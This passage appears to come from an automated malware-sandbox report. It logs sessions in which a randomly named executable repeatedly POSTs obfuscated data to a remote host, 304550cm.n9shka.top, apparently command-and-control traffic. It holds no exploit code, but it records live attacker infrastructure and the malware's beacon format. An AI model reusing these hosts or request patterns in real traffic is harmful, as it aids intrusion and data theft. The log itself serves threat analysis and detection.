                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          97192.168.2.46478780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:26.121084929 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:26.478346109 CEST2532OUTData Raw: 5b 5a 59 54 5a 52 5b 5a 5c 5a 51 56 57 52 57 53 50 58 5e 50 54 5d 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYTZR[Z\ZQVWRWSPX^PT]SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%];>)/X +=?0%?68$;U%)7^!>5Z(%?$7 ^.#G X/
                                                          Sep 8, 2024 11:53:26.782145977 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:26.916110039 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          98192.168.2.46478880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:27.062130928 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:27.415872097 CEST2532OUTData Raw: 5b 50 59 55 5f 5a 5b 5d 5c 5a 51 56 57 59 57 50 50 5f 5e 5c 54 5d 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [PYU_Z[]\ZQVWYWPP_^\T]SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^.!-]=Y43?=<3%Z87''9[".?%#[&'8.+#G X/)
                                                          Sep 8, 2024 11:53:27.753386974 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:27.884740114 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          99192.168.2.46478980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:28.012454033 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:28.369024992 CEST2532OUTData Raw: 5e 5e 5c 56 5a 5c 5e 5f 5c 5a 51 56 57 5f 57 52 50 51 5e 5b 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\VZ\^_\ZQVW_WRPQ^[TZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/1*=]#3)Z+X'*,B7S09X#-!X)6(0Q;:#G X/1
                                                          Sep 8, 2024 11:53:28.677365065 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:28.804590940 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          100192.168.2.46479080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:28.933787107 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          101192.168.2.46479180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:29.017903090 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:29.368956089 CEST1412OUTData Raw: 5e 59 5c 51 5a 5a 5e 5a 5c 5a 51 56 57 5f 57 54 50 5e 5e 58 54 5b 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\QZZ^Z\ZQVW_WTP^^XT[S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]/!!_>)7_#0#)'%/*,$8'+_!!?%3Y0\-+#G X/1
                                                          Sep 8, 2024 11:53:29.691461086 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:29.822422028 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 54 30 06 2e 05 22 58 38 0c 29 2f 2e 0c 3a 03 28 58 2a 5f 29 42 29 30 38 52 2a 11 25 07 29 02 36 1c 3e 3c 38 1c 23 21 27 58 32 0f 28 5e 03 11 20 01 36 3e 07 00 3e 07 00 5e 29 21 30 16 29 3c 20 00 23 37 20 53 20 3b 0e 5b 20 06 2a 52 28 5f 3a 51 2c 37 3d 44 2e 1d 08 51 21 34 2d 57 0c 12 20 1b 2b 00 0a 08 20 20 29 15 25 3d 39 1f 27 40 31 00 29 28 21 09 3c 16 25 03 31 32 06 08 26 3d 22 07 29 01 3a 14 30 07 05 11 36 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &T0."X8)/.:(X*_)B)08R*%)6><8#!'X2(^ 6>>^)!0)< #7 S ;[ *R(_:Q,7=D.Q!4-W + )%=9'@1)(!<%12&="):06-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          102192.168.2.46479280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:29.138989925 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:29.494157076 CEST2532OUTData Raw: 5e 5d 5c 51 5a 5f 5e 5d 5c 5a 51 56 57 5c 57 52 50 5e 5e 5d 54 5d 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\QZ_^]\ZQVW\WRP^^]T]SDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_.1=Z>9738)?03=87<39,"=(&,$Q+.+#G X/
                                                          Sep 8, 2024 11:53:29.825006962 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:29.960515022 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          103192.168.2.46479380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:30.091845036 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:30.448311090 CEST2532OUTData Raw: 5e 59 59 53 5a 5f 5b 5a 5c 5a 51 56 57 5f 57 5d 50 58 5e 5e 54 5f 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^YYSZ_[Z\ZQVW_W]PX^^T_SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\8W=^)/_40()<+^',9],';W385>6(5,&'4-;#G X/1
                                                          Sep 8, 2024 11:53:30.764965057 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:30.900378942 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          104192.168.2.46479480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:31.031528950 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:31.384638071 CEST2532OUTData Raw: 5b 5c 59 55 5a 5a 5b 5b 5c 5a 51 56 57 5a 57 50 50 5b 5e 58 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\YUZZ[[\ZQVWZWPP[^XT^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/9_>)+# 3*??3:,7?U0'".<3'+-+#G X/%
                                                          Sep 8, 2024 11:53:31.716950893 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:31.848675013 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          105192.168.2.46479580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:31.981065035 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:32.337816954 CEST2532OUTData Raw: 5b 58 5c 53 5a 59 5e 5d 5c 5a 51 56 57 5f 57 55 50 5b 5e 5c 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\SZY^]\ZQVW_WUP[^\TUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z/19[)9< 8(<3<),$'!5Y?&<3(-#G X/1
                                                          Sep 8, 2024 11:53:32.646858931 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:32.776804924 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          106192.168.2.46479680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:32.908288956 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:33.259749889 CEST2532OUTData Raw: 5b 51 5c 5f 5f 58 5e 58 5c 5a 51 56 57 5d 57 54 50 51 5e 50 54 5f 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\__X^X\ZQVW]WTPQ^PT_SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,W.=)(# =?('<&;R3'X6.2<&Y0Q8_-#G X/9
                                                          Sep 8, 2024 11:53:33.609750986 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:33.750930071 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          107192.168.2.46479780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:33.871974945 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:34.228385925 CEST2532OUTData Raw: 5b 5e 5c 50 5a 59 5b 5a 5c 5a 51 56 57 5c 57 52 50 5a 5e 5d 54 54 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^\PZY[Z\ZQVW\WRPZ^]TTSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;=^)##<*<$?,480?Z6*<60&4#/+#G X/
                                                          Sep 8, 2024 11:53:34.541845083 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:34.669367075 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          108192.168.2.46479880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:34.797240973 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          109192.168.2.46479980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:34.846730947 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:35.197118044 CEST1412OUTData Raw: 5b 5b 59 53 5a 5e 5b 5e 5c 5a 51 56 57 59 57 55 50 51 5e 5b 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YSZ^[^\ZQVWYWUPQ^[T[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^.1!>9#8Z><?^'>840+Y5=1Y+%/_04-#G X/)
                                                          Sep 8, 2024 11:53:35.530359983 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:35.668539047 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 55 24 3f 32 01 21 3e 0a 0b 3e 2c 2a 0e 39 3d 28 10 3d 2a 2d 0a 3e 0d 38 56 3e 2f 00 1d 2a 02 29 41 3d 5a 30 5e 23 08 33 5b 32 0f 28 5e 03 11 20 07 22 07 3a 5b 2b 29 0f 06 3e 31 06 15 28 3f 2c 01 22 1a 34 54 20 05 2c 12 34 06 2a 52 3f 3a 3d 08 2c 24 26 1a 39 55 32 1f 36 24 2d 57 0c 12 23 0f 3c 3d 28 0f 37 0d 00 00 26 00 3d 12 33 25 29 03 29 16 08 1c 3f 28 07 04 31 32 0d 50 24 13 3d 1d 2a 28 3a 59 27 17 0a 03 22 17 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &U$?2!>>,*9=(=*->8V>/*)A=Z0^#3[2(^ ":[+)>1(?,"4T ,4*R?:=,$&9U26$-W#<=(7&=3%))?(12P$=*(:Y'"$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          110192.168.2.46480080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:34.965585947 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:35.322144032 CEST2532OUTData Raw: 5b 50 5c 52 5a 5f 5b 50 5c 5a 51 56 57 52 57 53 50 51 5e 51 54 55 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\RZ_[P\ZQVWRWSPQ^QTUSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[;1%\?:?]#30]) 3/B7V%9(6.+'7^.#G X/
                                                          Sep 8, 2024 11:53:35.665493011 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:35.798425913 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          111192.168.2.46480180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:35.919670105 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:36.275186062 CEST2532OUTData Raw: 5b 5e 59 52 5a 5c 5b 5d 5c 5a 51 56 57 5f 57 51 50 59 5e 5a 54 5a 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^YRZ\[]\ZQVW_WQPY^ZTZSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,_?:( # *(3,''V09?Y5X2)%?_$4+:;#G X/1
                                                          Sep 8, 2024 11:53:36.585618973 CEST25INHTTP/1.1 100 Continue
